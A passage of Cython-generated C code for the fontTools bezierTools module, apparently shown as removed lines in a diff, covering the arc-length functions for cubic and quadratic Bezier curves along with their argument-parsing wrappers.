__Pyx_AddTraceback("fontTools.misc.bezierTools._calcCubicArcLengthCRecurse", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_one); - __Pyx_XDECREF(__pyx_v_two); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":104 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_7calcCubicArcLengthC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_6calcCubicArcLengthC, "calcCubicArcLengthC(double complex pt1, double complex pt2, double complex pt3, double complex pt4, double tolerance=0.005)\nCalculates the arc length for a cubic Bezier segment.\n\n Args:\n pt1,pt2,pt3,pt4: Control points of the Bezier as complex numbers.\n tolerance: Controls the precision of the calcuation.\n\n Returns:\n Arc length value.\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_7calcCubicArcLengthC = {"calcCubicArcLengthC", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_7calcCubicArcLengthC, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_6calcCubicArcLengthC}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_7calcCubicArcLengthC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - __pyx_t_double_complex __pyx_v_pt1; - __pyx_t_double_complex __pyx_v_pt2; - __pyx_t_double_complex __pyx_v_pt3; - __pyx_t_double_complex __pyx_v_pt4; - double __pyx_v_tolerance; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[5] = {0,0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("calcCubicArcLengthC (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_pt4,&__pyx_n_s_tolerance,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - CYTHON_FALLTHROUGH; - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 104, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 104, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicArcLengthC", 0, 4, 5, 1); __PYX_ERR(0, 104, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 104, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicArcLengthC", 0, 4, 5, 2); __PYX_ERR(0, 104, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt4)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 104, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicArcLengthC", 0, 4, 5, 3); __PYX_ERR(0, 104, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 4: - if (kw_args > 0) { - PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_tolerance); - if (value) { values[4] = __Pyx_Arg_NewRef_FASTCALL(value); kw_args--; } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 104, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "calcCubicArcLengthC") < 0)) __PYX_ERR(0, 104, __pyx_L3_error) - } - } else { - switch (__pyx_nargs) { - case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - CYTHON_FALLTHROUGH; - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - break; - default: goto __pyx_L5_argtuple_error; - } - } - __pyx_v_pt1 = __Pyx_PyComplex_As___pyx_t_double_complex(values[0]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 115, __pyx_L3_error) - __pyx_v_pt2 = __Pyx_PyComplex_As___pyx_t_double_complex(values[1]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 115, __pyx_L3_error) - __pyx_v_pt3 = __Pyx_PyComplex_As___pyx_t_double_complex(values[2]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 115, __pyx_L3_error) - __pyx_v_pt4 = __Pyx_PyComplex_As___pyx_t_double_complex(values[3]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 115, __pyx_L3_error) - if (values[4]) { - __pyx_v_tolerance = __pyx_PyFloat_AsDouble(values[4]); if (unlikely((__pyx_v_tolerance == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 115, __pyx_L3_error) - } else { - __pyx_v_tolerance = ((double)((double)0.005)); - } - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("calcCubicArcLengthC", 0, 4, 5, __pyx_nargs); __PYX_ERR(0, 104, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcCubicArcLengthC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_6calcCubicArcLengthC(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4, __pyx_v_tolerance); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_6calcCubicArcLengthC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3, __pyx_t_double_complex __pyx_v_pt4, double __pyx_v_tolerance) { - double __pyx_v_mult; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - PyObject *__pyx_t_7 = NULL; - PyObject *__pyx_t_8 = NULL; - int __pyx_t_9; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("calcCubicArcLengthC", 1); - - /* "fontTools/misc/bezierTools.py":125 - * Arc length value. - * """ - * mult = 1.0 + 1.5 * tolerance # The 1.5 is a empirical hack; no math # <<<<<<<<<<<<<< - * return _calcCubicArcLengthCRecurse(mult, pt1, pt2, pt3, pt4) - * - */ - __pyx_v_mult = (1.0 + (1.5 * __pyx_v_tolerance)); - - /* "fontTools/misc/bezierTools.py":126 - * """ - * mult = 1.0 + 1.5 * tolerance # The 1.5 is a empirical hack; no math - * return _calcCubicArcLengthCRecurse(mult, pt1, pt2, pt3, pt4) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_calcCubicArcLengthCRecurse); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 126, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyFloat_FromDouble(__pyx_v_mult); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 126, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __pyx_PyComplex_FromComplex(__pyx_v_pt1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 126, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = __pyx_PyComplex_FromComplex(__pyx_v_pt2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 126, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_6 = __pyx_PyComplex_FromComplex(__pyx_v_pt3); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 126, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_7 = __pyx_PyComplex_FromComplex(__pyx_v_pt4); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 126, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __pyx_t_8 = NULL; - __pyx_t_9 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_8 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_8)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_8); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_9 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[6] = {__pyx_t_8, __pyx_t_3, __pyx_t_4, __pyx_t_5, __pyx_t_6, __pyx_t_7}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_9, 5+__pyx_t_9); - __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 126, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":104 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_XDECREF(__pyx_t_7); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcCubicArcLengthC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":133 - * - * - * @cython.cfunc # <<<<<<<<<<<<<< - * @cython.inline - * @cython.returns(cython.double) - */ - -static CYTHON_INLINE double __pyx_f_9fontTools_4misc_11bezierTools__dot(__pyx_t_double_complex __pyx_v_v1, __pyx_t_double_complex __pyx_v_v2) { - double __pyx_r; - - /* "fontTools/misc/bezierTools.py":138 - * @cython.locals(v1=cython.complex, v2=cython.complex) - * def _dot(v1, v2): - * return (v1 * v2.conjugate()).real # <<<<<<<<<<<<<< - * - * - */ - __pyx_r = __Pyx_CREAL(__Pyx_c_prod_double(__pyx_v_v1, __Pyx_c_conj_double(__pyx_v_v2))); - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":133 - * - * - * @cython.cfunc # <<<<<<<<<<<<<< - * @cython.inline - * @cython.returns(cython.double) - */ - - /* function exit code */ - __pyx_L0:; - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":141 - * - * - * @cython.cfunc # <<<<<<<<<<<<<< - * @cython.inline - * @cython.returns(cython.double) - */ - -static CYTHON_INLINE double __pyx_f_9fontTools_4misc_11bezierTools__intSecAtan(double __pyx_v_x) { - double __pyx_r; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - int __pyx_t_6; - double __pyx_t_7; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_intSecAtan", 1); - - /* "fontTools/misc/bezierTools.py":148 - * # In : sympy.integrate(sp.sec(sp.atan(x))) - * # Out: x*sqrt(x**2 + 1)/2 + asinh(x)/2 - * return x * math.sqrt(x**2 + 1) / 2 + math.asinh(x) / 2 # <<<<<<<<<<<<<< - * - * - */ - __pyx_t_1 = PyFloat_FromDouble(__pyx_v_x); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_math); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_sqrt); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyFloat_FromDouble((pow(__pyx_v_x, 2.0) + 1.0)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_5 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_4))) { - __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_4); - if (likely(__pyx_t_5)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_4); - __Pyx_INCREF(__pyx_t_5); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_4, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_5, __pyx_t_3}; - __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_4, __pyx_callargs+1-__pyx_t_6, 1+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - } - __pyx_t_4 = PyNumber_Multiply(__pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_PyInt_TrueDivideObjC(__pyx_t_4, __pyx_int_2, 2, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_math); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_asinh); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyFloat_FromDouble(__pyx_v_x); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_5 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_5)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_5); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_5, __pyx_t_1}; - __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_6, 1+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_t_3 = __Pyx_PyInt_TrueDivideObjC(__pyx_t_4, __pyx_int_2, 2, 0, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyNumber_Add(__pyx_t_2, __pyx_t_3); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_7 = __pyx_PyFloat_AsDouble(__pyx_t_4); if (unlikely((__pyx_t_7 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_r = __pyx_t_7; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":141 - * - * - * @cython.cfunc # <<<<<<<<<<<<<< - * @cython.inline - * @cython.returns(cython.double) - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_AddTraceback("fontTools.misc.bezierTools._intSecAtan", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = -1; - __pyx_L0:; - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":151 - * - * - * def calcQuadraticArcLength(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * """Calculates the arc length for a quadratic Bezier segment. - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_9calcQuadraticArcLength(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_8calcQuadraticArcLength, "calcQuadraticArcLength(pt1, pt2, pt3)\nCalculates the arc length for a quadratic Bezier segment.\n\n Args:\n pt1: Start point of the Bezier as 2D tuple.\n pt2: Handle point of the Bezier as 2D tuple.\n pt3: End point of the Bezier as 2D tuple.\n\n Returns:\n Arc length value.\n\n Example::\n\n >>> calcQuadraticArcLength((0, 0), (0, 0), (0, 0)) # empty segment\n 0.0\n >>> calcQuadraticArcLength((0, 0), (50, 0), (80, 0)) # collinear points\n 80.0\n >>> calcQuadraticArcLength((0, 0), (0, 50), (0, 80)) # collinear points vertical\n 80.0\n >>> calcQuadraticArcLength((0, 0), (50, 20), (100, 40)) # collinear points\n 107.70329614269008\n >>> calcQuadraticArcLength((0, 0), (0, 100), (100, 0))\n 154.02976155645263\n >>> calcQuadraticArcLength((0, 0), (0, 50), (100, 0))\n 120.21581243984076\n >>> calcQuadraticArcLength((0, 0), (50, -10), (80, 50))\n 102.53273816445825\n >>> calcQuadraticArcLength((0, 0), (40, 0), (-40, 0)) # collinear points, control point outside\n 66.66666666666667\n >>> calcQuadraticArcLength((0, 0), (40, 0), (0, 0)) # collinear points, looping back\n 40.0\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_9calcQuadraticArcLength = {"calcQuadraticArcLength", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_9calcQuadraticArcLength, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_8calcQuadraticArcLength}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_9calcQuadraticArcLength(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[3] = {0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("calcQuadraticArcLength (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 151, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 151, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcQuadraticArcLength", 1, 3, 3, 1); __PYX_ERR(0, 151, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 151, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcQuadraticArcLength", 1, 3, 3, 2); __PYX_ERR(0, 151, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "calcQuadraticArcLength") < 0)) __PYX_ERR(0, 151, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 3)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("calcQuadraticArcLength", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 151, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcQuadraticArcLength", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_8calcQuadraticArcLength(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_8calcQuadraticArcLength(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject 